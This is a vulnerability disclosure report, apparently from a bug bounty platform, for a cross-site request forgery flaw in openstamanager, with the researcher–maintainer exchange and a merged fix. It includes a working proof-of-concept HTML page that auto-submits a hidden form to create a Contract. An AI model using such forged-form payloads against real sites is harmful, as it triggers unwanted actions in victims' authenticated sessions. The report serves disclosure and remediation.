Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager

Valid

Reported on

Jul 31st 2021


✍️ Description

Attacker able to create any Contract if users visit attacker site.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari.

2.now you can check a Contract with aaaa name have been created.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/controller.php?id_module=31" method="POST">
      <input type="hidden" name="id&#95;module" value="31" />
      <input type="hidden" name="id&#95;plugin" value="" />
      <input type="hidden" name="op" value="add" />
      <input type="hidden" name="backto" value="record&#45;edit" />
      <input type="hidden" name="id&#95;record" value="" />
      <input type="hidden" name="nome" value="aaaa" />
      <input type="hidden" name="idanagrafica" value="4" />
      <input type="hidden" name="hash" value="&#35;tab&#95;0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of create any Contract .

Fix

Set SameSite attribute of cookies to Lax or Strict.

Occurences

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 4 months ago
devcode-it/openstamanager maintainer
4 months ago

Maintainer


hi. on which version are you trying this? we have added same_cookie strict settings on april 2020 and removed just about 5 days for testing

amammad
4 months ago

Researcher


Hey man, how are you?

yah sorry about my bad.

I download last release named 2.4.24

amammad
4 months ago

Researcher


https://github.com/devcode-it/openstamanager/blob/40ba5847d1fd96b3cd074cc6d93af87aa7773e4f/core.php#L58 this file already edited 4 days ago and the strict commented here ....

amammad
4 months ago

Researcher


In this commit you comment the SameSite attribute:

https://github.com/devcode-it/openstamanager/commit/5135a2c04cd61c28e05ba6689d8943e4ec32f27c#diff-12c64b5df81f5ee6cf28ade08b1cb9e33d1e43339aa7c2aba61128d1bb57c83a

please accept my report as your last release is vulnerable.

devcode-it/openstamanager maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
loviuz submitted a
4 months ago
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca 4 months ago
loviuz has been awarded the fix bounty